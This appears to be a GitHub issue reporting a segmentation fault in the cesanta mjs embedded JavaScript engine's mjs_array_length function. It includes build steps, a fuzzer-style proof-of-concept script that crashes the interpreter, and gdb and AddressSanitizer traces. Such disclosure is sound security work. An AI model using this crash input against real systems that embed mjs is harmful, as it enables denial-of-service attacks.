search

cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com
Other
1.84k stars 171 forks source link

Segmentation fault on mjs_array_length #287

Open CStriker opened 3 months ago

CStriker commented 3 months ago

The name of an affected Product mjs

The affected version Commit: b1b6eac (Tag: 2.20.0)

Description An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file.

Vulnerability Type Segmentation fault

Environment

Ubuntu 20.04

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
poc ``` let c = { a: 7111.111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66.1511, foo: ffi-= 66.1511, foo: ffi-= 1, foo: ffi-= 111, foo: ffi-= 66.1511, foo: ffi('iit)««««««o: 1.«'), }; ```

run command

./mjs-asan -f poc

gdb info

Program received signal SIGSEGV, Segmentation fault.
0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
6929    unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) {
--Type <RET> for more, q to quit, c to continue without paging--
#0  0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
#1  0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", 
    src=0x612000000040 " let c = {\n  a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n  foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n  foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#2  0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067
#3  0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406

address sanitizer info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337947==The signal is caused by a READ memory access.
==1337947==Hint: address points to the zero page.
    #0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929
    #1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
    #2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
    #3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
    #4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
    #5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length
==1337947==ABORTING